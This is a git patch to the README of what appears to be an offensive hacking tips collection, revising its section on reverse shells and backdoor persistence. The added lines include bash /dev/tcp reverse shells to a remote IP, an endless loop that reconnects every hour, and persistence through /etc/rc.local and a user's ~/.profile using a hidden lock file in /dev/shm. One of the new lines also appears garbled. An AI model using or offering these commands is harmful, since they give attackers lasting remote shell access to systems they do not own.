From 70bc5c757161c49d8c6680795f720b37364ec39c Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Mon, 27 Jan 2020 11:09:37 +0000
Subject: [PATCH] Update README.md
cleanup for reverse backdoor with bash (no nc and no screen required) and adding to ~/.profile support.
---
README.md | 19 ++++++++++++++-----
1 file changed, 14 insertions(+), 5 deletions(-)
diff --git a/README.md b/README.md
index 26a080f..6876f63 100644
--- a/README.md
+++ b/README.md
@@ -329,7 +329,7 @@ $ nc -nvlp 1524
On the remote system, this command will connect back to your system (IP = 3.13.3.7, Port 1524) and give you a shell prompt:
```
-$ bash -i &>/dev/tcp/3.13.3.7/1524 0>&1
+$ setsid bash -i &>/dev/tcp/3.13.3.7/1524 0>&1 &
```
@@ -442,17 +442,26 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:3.13.3.7:1524
**6.i. Background reverse shell**
-A reverse shell that keeps trying to connect back to us every 3600 seconds (indefinitely). Often used until a real backdoor can be deployed and guarantees easy re-entry to a system in case our connection gets disconnected. Add to */etc/rc.local* if required...
+A reverse shell that keeps trying to connect back to us every 3600 seconds (indefinitely). Often used until a real backdoor can be deployed and guarantees easy re-entry to a system in case our connection gets disconnected.
```
-$ (while :; do nc -e /bin/bash -vn 3.13.3.7 1524; sleep 3600; done ) &>/dev/null &
+$ while :; do setsid bash -i &>/dev/tcp/127.1/1524 0>&1; sleep 3600; done &>/dev/null &
```
-Or
+or add to */etc/rc.local*:
```
-$ screen -d -m /bin/bash -c 'while :; do bash -i &>/dev/tcp/3.13.3.7/1524 0>&1; sleep 3600; done'
+nohup bash -c 'while :; do setsid bash -i &>/dev/tcp/127.1/1524 0>&1; sleep 3600; done' &>/dev/null &
```
+or the user's *~/.profile* (also stops multiple instances from being started):
+```
+fuser /dev/shm/.busy &>/dev/null
+if [ $? -eq 1 ]; then
+ nohup /bin/bash -c 'while :; do touch /dev/shm/.busy; exec 3/dev/tcp/3.13.3.7/1524 0>&1 ; sleep 3600; done' &>/dev/null &
+fi
+```
+
+
**6.ii. authorized_keys**